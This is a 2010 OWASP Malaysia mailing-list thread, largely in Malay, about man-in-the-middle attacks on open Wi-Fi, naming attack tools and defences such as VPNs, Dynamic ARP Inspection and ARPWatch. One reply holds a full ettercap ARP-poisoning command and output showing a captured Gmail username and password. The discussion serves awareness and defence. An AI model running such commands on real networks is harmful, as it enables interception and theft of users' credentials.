topik ni agak menarik.. ada fail pcap victim ? boleh saya tgk apa bezannya MiTM dgn connection yg real.
On Sat, Sep 25, 2010 at 2:39 AM, Amir Haris <[email protected]> wrote: > Masokis, > > Kalau network sendiri mungkin kita bleh control. Untuk protect switch dari > switch flood/gratuitous ARPs adalah dengan Contoh > - Aktifkan port-level security pada switch > - Aktifkan Dynamic ARP Inspection > - Gunakan network level encryption (IPsec, VPN). > > Akan tetapi kita guna open public network... So di luar kawalan.. > > rgds > > > On Sat, Sep 25, 2010 at 2:16 AM, MASOKIS <[email protected]> wrote: > >> kat indonesia siap buat bengkel lagi..wow... >> firewall tak mampu nak halang ke MiTM ni ? >> >> >> On Sat, Sep 25, 2010 at 1:34 AM, Faizul <[email protected]> wrote: >> >>> >>> kalau nak selamat sekurangnya ada jugak la antivirus, internet security >>> dan lain-lain. >>> sekurang-kurangnya mencabar sikit kalau sapa nak hack ke nak apa ke. >>> ini kosong je, bogel sapa tak stim. kalau askar nak gi perang bogel tak >>> pakai baju pun paling ciput ada rifle dengan peluru jugak. >>> guna broadband sendiri pun orang boleh tengok jgk, tp kena ada device >>> yang canggih baru boleh, spisis gsm interceptor dan lain-lain. >>> ada terbaca pasal GSM hacking ? A5/1 ? USRP ? openbts ? benda tu pun >>> ramai jugak berminat. kat indonesia ramai dah try main-main dgn benda ni. >>> >>> >>> >>> On Sat, Sep 25, 2010 at 12:18 AM, Amir Haris <[email protected]>wrote: >>> >>>> This paper is quite old, but it helps us to understand on how to detect >>>> sniffer. >>>> >>>> www.linux-sec.net/Sniffer.Detectors/snifferdetection.pdf >>>> >>>> >>>> >>>> On Fri, Sep 24, 2010 at 10:48 PM, Mohd Fazli Azran < >>>> [email protected]> wrote: >>>> >>>>> Hebat Guru Faizul nie buat live hack.. . memandangkan open network >>>>> memang bermasalah lagi2 kalau ada di mamak,kopitiam, atau mana2 kedai yang >>>>> memberikan access free wifi nie. Ramai rakyat Malaysia tidak sedar akan >>>>> kebolehan para2 hacker ni mencuri maklumat tanpa disedari oleh pengguna >>>>> yang >>>>> rata2 nye bergumbira bila dapat Wifi free tapi belakang takbir mereka tak >>>>> tau. >>>>> >>>>> Tapi please consider use VPN kalau nak masuk ke open network nie.. >>>>> maybe akan banyak membantu anda untuk protect laptop anda dari di sniffer >>>>> yang senantiasa membaca packet anda... >>>>> >>>>> Pastikan anda delete semua cookie yang ada dalam browser anda sebelum >>>>> connect ke wifi tersebut. Pastikan yer!! >>>>> >>>>> Kalau untuk pengguna window tegar boleh try guna Hotspot >>>>> Shield<http://anchorfree.com/downloads/hotspot-shield/>ini. banyak >>>>> kebaikannya... amin!!! dah ada untuk iphone la .. boleh download >>>>> untuk peminat2 iphone. :) >>>>> >>>>> Pastikan laptop anda tidak ada buat public file sharing.. pastikan >>>>> tau!!! >>>>> >>>>> Last jangan connect terlampau lama dengan open network ni lagi lama >>>>> anda connect lagi banyak information hackers2 ni dapat. Pastikan anda >>>>> tidak >>>>> leka dan lalai yer!!! >>>>> >>>>> Sebenarnya banyak lagi software yang boleh digunakan untuk protect >>>>> laptop anda jika anda banyak explore dan menyelidik sedikit sebanyak >>>>> tentang >>>>> cara nak protect laptop anda especially untuk pengguna windows.. tapi >>>>> jangan >>>>> sangka pulak pengguna OS lain boleh terlepas... huhuhu. >>>>> P/S: kalau anda rasa anda seorang geek cuba guna ARPWatch, >>>>> Arpsnmp atau DecaffeinatID anda mesti menyukainya.. :P >>>>> On Fri, Sep 24, 2010 at 9:20 PM, Faizul <[email protected]> wrote: >>>>> >>>>>> ettercap -TqM ARP:REMOTE /10.1.1.10/ /10.1.1.254/ <--- 10 adalah >>>>>> target dan 254 adalah gateway >>>>>> >>>>>> ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA <--- ini naga atau >>>>>> dragon >>>>>> >>>>>> Listening on eth0... (Ethernet) >>>>>> >>>>>> eth0 -> 00:0C:29:97:59:E4 10.1.1.1 255.255.255.0 >>>>>> >>>>>> Privileges dropped to UID 0 GID 0... >>>>>> >>>>>> 28 plugins >>>>>> 39 protocol dissectors >>>>>> 53 ports monitored >>>>>> 7587 mac vendor fingerprint >>>>>> 1698 tcp OS fingerprint >>>>>> 2183 known services >>>>>> >>>>>> Scanning for merged targets (2 hosts)... >>>>>> >>>>>> * |==================================================>| 100.00 % >>>>>> >>>>>> 2 hosts added to the hosts list... >>>>>> >>>>>> ARP poisoning victims: >>>>>> >>>>>> GROUP 1 : 10.1.1.10 00:26:22:E1:6D:92 >>>>>> >>>>>> GROUP 2 : 10.1.1.254 00:1F:FB:08:D1:C6 >>>>>> Starting Unified sniffing... >>>>>> >>>>>> >>>>>> Text only Interface activated... >>>>>> Hit 'h' for inline help >>>>>> >>>>>> HTTP : 74.125.127.99:443 -> USER: 9w2pju PASS: selamathariraya >>>>>> INFO: >>>>>> https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/?ui=html&zy=l&bsv=1eic6yu9oa4y3 >>>>>> >>>>>> >>>>>> On Fri, Sep 24, 2010 at 8:30 PM, Amir Haris <[email protected]>wrote: >>>>>> >>>>>>> Haris, >>>>>>> >>>>>>> Yes.. mmg possible sangat2. aku ada demo masa DNSSEC seminar... >>>>>>> >>>>>>> >>>>>>> On Fri, Sep 24, 2010 at 8:17 PM, Hazrul Hamzah >>>>>>> <[email protected]>wrote: >>>>>>> >>>>>>>> Based on the blog post, plenty of tools can be used to perform such >>>>>>>> attacks. Nowadays tools are getting more "user friendly" and yeah >>>>>>>> since >>>>>>>> he's using insecure Wifi facility -visible network packets/traffics >>>>>>>> - >>>>>>>> perhaps webmitm, dnsspoof can be used. Or perhaps sidejacking with >>>>>>>> ferret and hamster is much more easier. But based on the symptoms or >>>>>>>> the >>>>>>>> screenshots, it is more monkey in the middle attack compared to >>>>>>>> sidejacking (I prefer this one). >>>>>>>> >>>>>>>> So, never access your private accounts using insecure or open ap >>>>>>>> wireless environment. Guna la broadband.. :D >>>>>>>> >>>>>>>> p/s: besides I believe nobody actually read/understand/concern on >>>>>>>> the >>>>>>>> warning popups regarding the cert validity. Usually we just click >>>>>>>> "Add >>>>>>>> exception" and "proceed" :D >>>>>>>> >>>>>>>> That's my 2 halala >>>>>>>> >>>>>>>> Thanks >>>>>>>> >>>>>>>> On 24/09/2010 19:38, Fathi Kamil Zainuddin wrote: >>>>>>>> > There is https/ssl mitm in the cain & abel using fake >>>>>>>> private/public key. It intercepts the ssl handshake and providing the >>>>>>>> fake >>>>>>>> key (if the key is not trusted) to the client. In my previous test, my >>>>>>>> friend realized a fake ssl for maybank site when I'm running the >>>>>>>> attack, and >>>>>>>> he told me maybank has been hacked (but not). For wireless (not >>>>>>>> ethernet) >>>>>>>> layer 2, there is utility like airpwn and karma for this kind of >>>>>>>> attack. I >>>>>>>> haven't read yet the blog but to answer first the question. >>>>>>>> Wallahualam. >>>>>>>> > Sent from my BlackBerry® smartphone >>>>>>>> > >>>>>>>> > -----Original Message----- >>>>>>>> > From: Harisfazillah Jamel <[email protected]> >>>>>>>> > Sender: [email protected] >>>>>>>> > Date: Fri, 24 Sep 2010 19:21:31 >>>>>>>> > To: owasp-malaysia<[email protected]> >>>>>>>> > Subject: Re: [Owasp-Malaysia] Man In The Middle Attack Wireless >>>>>>>> > >>>>>>>> > Tittle should be man in the minddle attack.. >>>>>>>> > >>>>>>>> > ettercap can be used to capture packet. But its hard to get our >>>>>>>> > password in HTTPS protocol. I believe a kind of proxy is used for >>>>>>>> > this. >>>>>>>> > >>>>>>>> > Any idea what kind of proxy? >>>>>>>> > >>>>>>>> > >>>>>>>> > On Fri, Sep 24, 2010 at 7:04 PM, Hasanuddin Abu Bakar <> wrote: >>>>>>>> >> ARP poisoning can be used.ettercap >>>>>>>> >> >>>>>>>> >> On 24 Sep 2010 19:02, "Harisfazillah Jamel" < >>>>>>>> [email protected]> wrote: >>>>>>>> >>> Assalamualaikum and salam sejahtera, >>>>>>>> >>> >>>>>>>> >>> Would like to share this blog post. >>>>>>>> >>> >>>>>>>> >>> http://blog.mohdhanif.com/aku-telah-berjaya-di-hack/ >>>>>>>> >>> >>>>>>>> >>> How man in the middle attack can be used in this case? >>>>>>>> >>> >>>>>>>> >>> Thanks. >>>>>>>> > _______________________________________________ >>>>>>>> > Owasp-Malaysia mailing list >>>>>>>> > [email protected] >>>>>>>> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>>>>>>> > >>>>>>>> > OWASP Malaysia Wiki >>>>>>>> > http://www.owasp.org/index.php/Malaysia >>>>>>>> > >>>>>>>> > OWASP Malaysia Wiki Facebook >>>>>>>> > >>>>>>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>>>>>>> > _______________________________________________ >>>>>>>> > Owasp-Malaysia mailing list >>>>>>>> > [email protected] >>>>>>>> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>>>>>>> > >>>>>>>> > OWASP Malaysia Wiki >>>>>>>> > http://www.owasp.org/index.php/Malaysia >>>>>>>> > >>>>>>>> > OWASP Malaysia Wiki Facebook >>>>>>>> > >>>>>>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>>>>>>> > >>>>>>>> >>>>>>>> _______________________________________________ >>>>>>>> Owasp-Malaysia mailing list >>>>>>>> [email protected] >>>>>>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>>>>>>> >>>>>>>> OWASP Malaysia Wiki >>>>>>>> http://www.owasp.org/index.php/Malaysia >>>>>>>> >>>>>>>> OWASP Malaysia Wiki Facebook >>>>>>>> >>>>>>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>>>>>>> >>>>>>> >>>>>>> >>>>>>> _______________________________________________ >>>>>>> Owasp-Malaysia mailing list >>>>>>> [email protected] >>>>>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>>>>>> >>>>>>> OWASP Malaysia Wiki >>>>>>> http://www.owasp.org/index.php/Malaysia >>>>>>> >>>>>>> OWASP Malaysia Wiki Facebook >>>>>>> >>>>>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>>>>>> >>>>>> >>>>>> >>>>>> >>>>>> -- >>>>>> 73 de 9W2PJU >>>>>> >>>>>> http://9w2pju.blogspot.com >>>>>> >>>>>> >>>>>> _______________________________________________ >>>>>> Owasp-Malaysia mailing list >>>>>> [email protected] >>>>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>>>>> >>>>>> OWASP Malaysia Wiki >>>>>> http://www.owasp.org/index.php/Malaysia >>>>>> >>>>>> OWASP Malaysia Wiki Facebook >>>>>> >>>>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>>>>> >>>>> Mohd Fazli Azran >>>>> Pengguna Internet Tegar >>>>> >>>>> _______________________________________________ >>>>> Owasp-Malaysia mailing list >>>>> [email protected] >>>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>>>> >>>>> OWASP Malaysia Wiki >>>>> http://www.owasp.org/index.php/Malaysia >>>>> >>>>> OWASP Malaysia Wiki Facebook >>>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>>>> >>>> >>>> >>>> _______________________________________________ >>>> Owasp-Malaysia mailing list >>>> [email protected] >>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>>> >>>> OWASP Malaysia Wiki >>>> http://www.owasp.org/index.php/Malaysia >>>> >>>> OWASP Malaysia Wiki Facebook >>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>>> >>> >>> >>> >>> -- >>> 73 de 9W2PJU >>> >>> http://9w2pju.blogspot.com >>> >>> >>> _______________________________________________ >>> Owasp-Malaysia mailing list >>> [email protected] >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>> >>> OWASP Malaysia Wiki >>> http://www.owasp.org/index.php/Malaysia >>> >>> OWASP Malaysia Wiki Facebook >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>> >> >> >> >> -- >> *>> HTTP://WWW.MASOKIS.COM <<* >> >> >> _______________________________________________ >> Owasp-Malaysia mailing list >> [email protected] >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> >> OWASP Malaysia Wiki >> http://www.owasp.org/index.php/Malaysia >> >> OWASP Malaysia Wiki Facebook >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> > > > _______________________________________________ > Owasp-Malaysia mailing list > [email protected] > https://lists.owasp.org/mailman/listinfo/owasp-malaysia > > OWASP Malaysia Wiki > http://www.owasp.org/index.php/Malaysia > > OWASP Malaysia Wiki Facebook > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > -- *>> HTTP://WWW.MASOKIS.COM <<*
_______________________________________________ Owasp-Malaysia mailing list [email protected] https://lists.owasp.org/mailman/listinfo/owasp-malaysia OWASP Malaysia Wiki http://www.owasp.org/index.php/Malaysia OWASP Malaysia Wiki Facebook http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
